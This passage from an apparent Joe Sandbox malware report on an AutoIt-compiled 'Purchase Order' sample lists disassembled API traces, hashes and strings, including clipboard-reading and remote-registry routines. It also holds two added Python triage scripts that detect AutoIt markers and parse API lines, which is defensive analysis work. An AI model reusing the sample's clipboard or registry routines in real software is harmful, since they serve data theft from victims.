                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateObject$Global$Rect$DeleteFileSelect$7427MessageSendShow$7428462074285742861A480A570AdjustAllocClientCloseCopyDesktopFaceFontFreeHandleImageLoadLockMovePictureReadSizeStockStreamTextUnlock_wcscpy_wcslen
                                  • String ID: $AutoIt v3$DISPLAY$static
                                  • API String ID: 1129336510-2373415609
                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32(?,?,?), ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: 742845F0.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$742845DeleteFillFrameMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 2652913774-0
                                  • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  APIs
                                  • 74285CF0.USER32(?), ref: 004590F2
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                  • 742861E0.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                  • 74284620.GDI32(00000000,0000005A), ref: 004592CD
                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$7428462074285742861AdjustClientDeleteFaceFontInfoParametersSelectShowSystemText
                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                  • API String ID: 1752801206-517079104
                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
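The string IDs above (#NoAutoIt3Execute, #include-once, #requireadmin and the rest) are AutoIt3 script pre-processor directives, and the only API the routine imports is __wcsnicmp, a wide-character compare. Both facts matter for triage: the sample carries the AutoIt runtime, and its directive strings are stored as UTF-16LE, so a narrow-string grep for "#requireadmin" will miss them. The following scanner is an added example, not part of the Joe Sandbox report or of AutoIt. It searches a file for the directive strings listed in this report and for the "AutoIt v3" window title in both ANSI and UTF-16LE form; the "AU3!EA06" compiled-script marker it also looks for is an assumption taken from public AutoIt unpacking tools, not something this report shows.

```python
"""Triage check for AutoIt3-compiled executables.

Added example, not part of the Joe Sandbox report or of AutoIt. Looks for the
pre-processor directive strings the report lists for this sample and for the
'AutoIt v3' window title, in both ANSI and UTF-16LE form, plus the 'AU3!EA06'
compiled-script marker (assumption: taken from public AutoIt unpacking tools).
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Directive keywords from the report's String ID line for the parser routine
# that calls __wcsnicmp. Because the compare is wide-char, these live in the
# binary as UTF-16LE; a narrow-string grep alone would miss them.
AUTOIT_DIRECTIVES = [
    "#NoAutoIt3Execute", "#OnAutoItStartRegister", "#comments-start",
    "#comments-end", "#include-once", "#include", "#notrayicon",
    "#requireadmin", "Cannot parse #include",
    "Unterminated group of comments",
]
AUTOIT_WINDOW_TITLE = "AutoIt v3"   # CreateWindowExW title seen in the report
AU3_MARKER = b"AU3!EA06"            # assumption: public compiled-script marker


@dataclass
class ScanResult:
    directives: List[str] = field(default_factory=list)
    has_window_title: bool = False
    marker_offsets: List[int] = field(default_factory=list)

    @property
    def likely_autoit(self) -> bool:
        # The marker alone is decisive. Otherwise require the runtime's window
        # title plus several directive keywords, so one stray '#include' in an
        # unrelated binary does not trigger.
        return bool(self.marker_offsets) or (
            self.has_window_title and len(self.directives) >= 3)


def _encodings(s: str) -> Tuple[bytes, bytes]:
    """ANSI and UTF-16LE forms of a string, the two ways it can be embedded."""
    return s.encode("ascii"), s.encode("utf-16-le")


def scan_bytes(blob: bytes) -> ScanResult:
    res = ScanResult()
    for directive in AUTOIT_DIRECTIVES:
        # '#include' also matches inside '#include-once'; acceptable for a
        # presence count, which is all the verdict uses.
        if any(enc in blob for enc in _encodings(directive)):
            res.directives.append(directive)
    res.has_window_title = any(enc in blob for enc in _encodings(AUTOIT_WINDOW_TITLE))
    res.marker_offsets = [m.start() for m in re.finditer(re.escape(AU3_MARKER), blob)]
    return res


def scan_file(path: str) -> ScanResult:
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


if __name__ == "__main__":
    import sys
    r = scan_file(sys.argv[1])
    print(f"likely AutoIt: {r.likely_autoit}")
    print(f"directives: {r.directives}")
    print(f"AU3 marker at: {[hex(o) for o in r.marker_offsets]}")
```

Run it against the sample file to confirm the runtime, then hand the file to an AutoIt decompiler to recover the script; the directive strings only prove the interpreter is present, not what the embedded script does.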
                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • 742845F0.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflate$742845FocusMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 1182366783-0
                                  • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  APIs
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseConnectCreateRegistry
                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                  • API String ID: 3217815495-966354055
                                  • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                  • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
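Two of the function listings above are the ones worth pivoting on: the routine at 0045953B..00459A6D that creates an "AutoIt v3" window and reads an image file through CreateFileW, GlobalAlloc, CreateStreamOnHGlobal and OleLoadPicture, and the routine at 0046BAE6..0046BB8A that calls RegConnectRegistryW, RegCreateKeyExW and RegCloseKey with REG_SZ, REG_BINARY and the other value-type names as strings. Note also entries such as 74285CF0.USER32 and 742861E0.GDI32: when Joe Sandbox cannot map a call target to an export name it prints the raw address with the module, so these are unresolved user32/gdi32 calls, not custom code. The parser below is an added example, not the report's own tooling: it reads API lines in the report's format, flags unresolved targets, pulls out literal string arguments, and assigns coarse capability tags. The tag table is my own triage shortlist, not a Joe Sandbox classification, and the sample input is constructed from lines copied out of the listings above.

```python
"""Parse the API-call lines of a Joe Sandbox function block and summarise
what the function touches.

Added example, not the report's own tooling. Reads lines of the form
'• Name.MODULE(args), ref: ADDR' (and the indented 'Part of subcall
function' variant), flags entries whose name is a bare address such as
74285CF0.USER32 (the sandbox prints the call target when it could not
resolve it to an export), and assigns coarse capability tags. The TAGS
table is my own triage shortlist, not a Joe Sandbox classification.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z_0-9]*|[0-9A-F]{8})\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32 = re.compile(r"[0-9A-F]{8}")

# Assumption: my own shortlist of API name fragments worth tagging.
TAGS: Dict[str, Tuple[str, ...]] = {
    "registry": ("RegConnectRegistry", "RegCreateKey", "RegOpenKey", "RegSetValue"),
    "file-read": ("CreateFileW", "ReadFile", "GetFileSize"),
    "ole-image": ("CreateStreamOnHGlobal", "OleLoadPicture"),
    "gui": ("CreateWindowExW", "SendMessageW", "ShowWindow"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]

    @property
    def unresolved(self) -> bool:
        # A name that is just eight hex digits is an unresolved call target.
        return HEX32.fullmatch(self.name) is not None


def parse_calls(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers, memory-dump lines, hashes
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            name=m["name"], module=m["mod"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def summarize(text: str) -> dict:
    calls = parse_calls(text)
    tags = sorted({tag for c in calls for tag, frags in TAGS.items()
                   if any(f in c.name for f in frags)})
    unresolved = sorted({f"{c.name}.{c.module}" for c in calls if c.unresolved})
    # Literal string arguments (window titles, class names) are cheap pivots;
    # drop hex immediates and the '?' placeholder for unknown values.
    strings = sorted({a for c in calls for a in c.args
                      if a and a != "?" and not HEX32.fullmatch(a)})
    return {
        "calls": len(calls),
        "modules": dict(Counter(c.module for c in calls)),
        "tags": tags,
        "unresolved": unresolved,
        "string_args": strings,
    }


# Constructed input: API lines copied from the function listings in this report.
SAMPLE = """\
• DeleteObject.GDI32(?), ref: 0045953B
• 74285CF0.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• _wcslen.LIBCMT ref: 00459916
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
"""

if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Paste a whole "APIs" block into SAMPLE (or feed a saved copy of the report to parse_calls) to get the same summary per function; unresolved entries are the ones to resolve manually against the loaded user32/gdi32 image base before deciding whether a routine is plain GUI code or something more interesting.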
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004566AE
                                  • GetDesktopWindow.USER32 ref: 004566C3
                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                  • 742845F0.USER32(?,000000F0), ref: 00456722
                                  • 742845F0.USER32(?,000000F0), ref: 00456735
                                  • 74285CF0.USER32(?), ref: 00456746
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                  • CopyRect.USER32(?,?), ref: 004568BE
                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                  Similarity
                                  • API ID: MessageSend$Window$Rect$742845Monitor$74285CopyCreateCursorDesktopFromInfoPointVisible
                                  • String ID: ($,$tooltips_class32
                                  • API String ID: 930342530-3320066284
                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                  APIs
                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                  • CloseClipboard.USER32 ref: 0046DD0D
                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                  • CloseClipboard.USER32 ref: 0046DD41
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                  • CloseClipboard.USER32 ref: 0046DD99
                                  Similarity
                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                  • String ID:
                                  • API String ID: 15083398-0
                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
